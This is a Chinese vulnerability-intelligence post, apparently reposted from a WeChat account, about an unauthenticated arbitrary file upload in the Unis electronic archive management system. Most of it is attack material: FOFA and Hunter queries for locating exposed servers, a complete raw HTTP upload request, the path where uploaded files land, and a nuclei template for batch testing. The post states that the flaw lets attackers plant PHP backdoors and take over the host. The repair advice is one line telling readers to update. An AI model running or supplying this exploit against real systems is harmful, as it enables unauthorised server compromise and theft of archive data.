【漏洞情报 | 新】紫光档案系统任意文件上传

admin
admin
admin
104125
文章
87
评论
2023年9月19日11:04:50评论232 views字数 3203阅读10分40秒阅读模式

免责声明

文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

产品简介

紫光电子档案管理系统是清华紫光在多年档案项目产品研发的基础上,于2015年推出的新一代互联网架构的电子档案系统。遵循国家档案管理标准,结合先进的信息化管理理念,使用领先的互联网云计算(J2EE+PHP)的技术框架,和采用流行的网络UE设计优化用户体验,可为企业快速构建高质量的先进性、安全性、前瞻性的综合档案管理平台。

【漏洞情报 | 新】紫光档案系统任意文件上传

漏洞描述

紫光电子档案管理系统上传接口/System/Cms/upload.html存在未授权访问,导致任意文件上传漏洞,恶意攻击者可以直接上传恶意PHP后门文件,恶意PHP代码能够解析执行造成主机权限丢失,严重威胁系统以及数据相关安全。

网络测绘

favicon图标特征【漏洞情报 | 新】紫光档案系统任意文件上传FOFA网络测绘搜索

app="紫光档案管理系统"

鹰图网络测绘搜索

app.name="紫光档案管理系统"

漏洞复现

访问URL地址,界面如下

【漏洞情报 | 新】紫光档案系统任意文件上传

发送请求包上传文件,根据响应包得到文件保存路径

POST /System/Cms/upload.html?token= HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 554
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr

------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="userID"

admin
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="fondsid"

1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="comid"

1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="token"

1
------WebKitFormBoundary3enKbCUwg60aGZcr
Content-Disposition: form-data; name="files[]"; filename="test.txt"

file-upload-test
------WebKitFormBoundary3enKbCUwg60aGZcr--

【漏洞情报 | 新】紫光档案系统任意文件上传

根据响应包拼接路径,即可访问上传的文件,例如:

http://127.0.0.1:80/uploads/company1/fonds1/cms/20230919/UNIS-4eNGCaBibaHch8O8Yrc9e6nOB.txt
【漏洞情报 | 新】紫光档案系统任意文件上传

nuclei批量验证POC模板

id: ziguang_danganmanage_system_uploads_file

info:
  name: ziguang_danganmanage_system_uploads_file
  author: 4Zen
  severity: high
  tags: rce,fileupload,intrusive
  metadata:
    max-request: 1

http:
  - raw:
      - |
        POST /System/Cms/upload.html?token= HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
        Connection: close
        Content-Length: 554
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr

        ------WebKitFormBoundary3enKbCUwg60aGZcr
        Content-Disposition: form-data; name="userID"

        admin
        ------WebKitFormBoundary3enKbCUwg60aGZcr
        Content-Disposition: form-data; name="fondsid"

        1
        ------WebKitFormBoundary3enKbCUwg60aGZcr
        Content-Disposition: form-data; name="comid"

        1
        ------WebKitFormBoundary3enKbCUwg60aGZcr
        Content-Disposition: form-data; name="token"

        1
        ------WebKitFormBoundary3enKbCUwg60aGZcr
        Content-Disposition: form-data; name="files[]"; filename="test.txt"

        file-upload-test
        ------WebKitFormBoundary3enKbCUwg60aGZcr--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "test.txt"
          - "cms"
          - "uploads"
          - "fonds1"
          - "company1"

      - type: status
        status:
          - 200
【漏洞情报 | 新】紫光档案系统任意文件上传

修复方案

及时更新到最新版本或根据情况联系供应商获取最佳修复方案。

原文始发于微信公众号(划水但不摆烂):【漏洞情报 | 新】紫光档案系统任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月19日11:04:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞情报 | 新】紫光档案系统任意文件上传http://cn-sec.com/archives/2048247.html

发表评论

匿名网友 填写信息